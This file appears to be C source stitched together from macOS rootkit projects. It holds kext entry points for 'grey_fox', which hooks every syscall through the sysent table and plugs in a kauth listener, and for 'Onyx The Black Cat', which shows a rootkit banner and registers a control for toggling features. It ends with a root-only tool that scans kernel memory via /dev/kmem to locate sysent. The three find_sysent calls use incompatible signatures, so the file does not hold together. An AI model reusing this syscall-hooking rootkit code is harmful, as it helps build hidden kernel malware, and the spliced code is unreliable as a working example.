kern_return_t grey_fox_start(kmod_info_t * ki, void *d)
{
    /*
     * Kext entry point. Resolves the sysent table through find_sysent(),
     * stores it in the file-scope _sysent, installs the syscall hooks over
     * it and finally plugs the kauth listener.
     *
     * Returns KERN_FAILURE when sysent cannot be located (nothing has been
     * hooked at that point, so there is nothing to undo) and KERN_SUCCESS
     * otherwise. ki and d are not used. kernel_base is only passed through
     * to find_sysent(); its value is not consumed here.
     */
    LOG_INFO("Rawr, hi kernel!");

    mach_vm_address_t kernel_base = 0;
    _sysent = find_sysent(&kernel_base);
    if (_sysent == NULL) {
        return KERN_FAILURE;
    }

    hook_all_syscalls(_sysent);
    plug_kauth_listener();

    return KERN_SUCCESS;
}
/*
 * THE FUN STARTS HERE
 */
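kern_return_t 
onyx_the_black_cat_start (kmod_info_t * ki, void * d) 
{
    /*
     * Kext entry point: prints the banner, locates sysent, fills
     * g_kernel_info and only then registers the kernel control through
     * which features are enabled/disabled.
     *
     * The kernel control is registered last on purpose: the failure paths
     * below return KERN_FAILURE without unregistering anything, so
     * registering it first would leave a live control behind after a
     * failed start. (Assumes find_sysent()/init_kernel_info() do not
     * depend on the control being present — they take no input from it.)
     *
     * Returns KERN_FAILURE if sysent or the kernel info cannot be
     * resolved, KERN_SUCCESS otherwise. ki and d are unused.
     */
    printf(
           " _____                 \n"
           "|     |___ _ _ _ _     \n"
           "|  |  |   | | |_'_|    \n"
           "|_____|_|_|_  |_,_|    \n"
           "          |___|        \n"
           "      The Black Cat v%s\n", VERSION);
    // locate sysent table; without it there is nothing to control
    if (find_sysent() != KERN_SUCCESS)
    {
        return KERN_FAILURE;
    }
    if (init_kernel_info(&g_kernel_info) != KERN_SUCCESS)
    {
        return KERN_FAILURE;
    }
    // install the kernel control so we can enable/disable features;
    // done after everything else succeeded so no failure path above
    // has to undo it
    install_kern_control();
    // ALL DONE
    return KERN_SUCCESS;
}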
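int
main(int argc, char ** argv)
{
	/*
	 * Locates the in-kernel sysent table by reading kernel memory through
	 * /dev/kmem: resolves the int80 handler address from the IDT, derives
	 * the kernel base from it, asks process_header() for the address and
	 * size of the region to scan, copies that region out with readkmem()
	 * and searches it with find_sysent().
	 *
	 * Must run as root and needs /dev/kmem enabled. Every error goes to
	 * stderr and the process exits with status 1; "sysent not found" is
	 * reported as a failure as well, so scripts can rely on the exit code.
	 * argc/argv are unused.
	 */
	header();

	// we need to run this as root
	if (getuid() != 0)
	{
		fprintf(stderr, "[ERROR] Please run me as root!\n");
		exit(1);
	}

	int8_t kernel_type = get_kernel_type();
	if (kernel_type == -1)
	{
		fprintf(stderr, "[ERROR] Unable to retrieve kernel type!\n");
		exit(1);
	}

	if ((fd_kmem = open("/dev/kmem", O_RDWR)) == -1)
	{
		fprintf(stderr, "[ERROR] Error while opening /dev/kmem. Is /dev/kmem enabled?\n");
		fprintf(stderr, "Add parameter kmem=1 to /Library/Preferences/SystemConfiguration/com.apple.Boot.plist\n");
		exit(1);
	}

	// retrieve int80 address and derive the kernel base from it
	idt_t idt_address = get_addr_idt(kernel_type);
	uint64_t int80_address = calculate_int80address(idt_address, kernel_type);

	uint64_t kernel_base = find_kernel_base(int80_address, kernel_type);
	if (kernel_base == 0)
	{
		fprintf(stderr, "[ERROR] Could not find kernel base address!\n");
		close(fd_kmem);
		exit(1);
	}

	// region of kernel memory that will be copied out and scanned for sysent
	uint64_t data_address = 0;
	uint64_t data_size    = 0;
	process_header(kernel_base, &data_address, &data_size);
	if (data_size == 0)
	{
		// malloc(0) may legitimately return NULL; report an empty region
		// as such instead of as an allocation failure
		fprintf(stderr, "[ERROR] Could not determine the region to scan for sysent!\n");
		close(fd_kmem);
		exit(1);
	}

	// named kernel_data rather than "read" so it does not shadow read(2)
	uint8_t *kernel_data = malloc((size_t)data_size);
	if (kernel_data == NULL)
	{
		fprintf(stderr, "[ERROR] Memory allocation failed!\n");
		close(fd_kmem);
		exit(1);
	}

	// read kernel memory and find sysent
	readkmem(fd_kmem, kernel_data, data_address, (size_t)data_size);
	uint64_t sysent_address = find_sysent(kernel_data, data_address, data_size);

	int status = 0;
	if (sysent_address)
	{
		printf("[OK] Found sysent address at %p\n", (void*)sysent_address);
	}
	else
	{
		fprintf(stderr, "[ERROR] Could not find sysent address!\n");
		status = 1;
	}

	free(kernel_data);
	close(fd_kmem);
	return status;
}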